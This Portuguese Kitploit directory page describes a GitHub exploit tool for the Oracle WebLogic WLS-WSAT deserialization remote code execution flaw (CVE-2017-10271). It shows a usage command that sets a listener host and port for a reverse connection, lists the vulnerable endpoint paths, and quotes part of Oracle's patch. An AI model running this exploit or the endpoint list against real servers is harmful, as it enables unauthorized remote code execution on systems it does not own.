Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-10271 — Oracle WebLogic WLS-WSAT Exploração de Execução Remota de Código (CVE-2017-10271) | Kitploit
Ferramentas/GitHubGitHub/kkirsche/cve-2017-10271
Frameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Oracle WebLogic WLS-WSAT Exploração de Execução Remota de Código (CVE-2017-10271)

Ver Repositório
12942há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-10271

Script de Detecção e Exploração da Vulnerabilidade de Desserialização do Componente wls-wsat do Weblogic (CVE-2017-10271)

Uso

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

Funcionalidades

  • Script Python independente
    • Funcionalidade de verificação para descobrir se um host é vulnerável
    • Funcionalidade de exploração para alvos Linux
  • Módulo Metasploit
    • Funcionalidade de verificação para descobrir se um host é vulnerável
    • Funcionalidade de exploração para todos os alvos
  • Scanner (./scanners)
    • Verifica se os hosts são vulneráveis. Totalmente autocontido

Avisos Legais

Você é responsável pelo uso deste script. Kevin Kirsche não se responsabiliza por quaisquer ações tomadas usando o código aqui presente. O código foi criado para equipes que desejam validar a segurança de seus servidores, e não para uso malicioso.

Agradecimentos

Muitos agradecimentos ao Luffin por criar o POC original no qual este se baseia: https://github.com/Luffin/CVE-2017-10271

URLs vulneráveis além da mostrada:

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

Vulnerabilidade Relacionada

CVE 2017-3506

Correção da Oracle

Fonte Original: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

Fonte Atualizada: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
Baixar ferramenta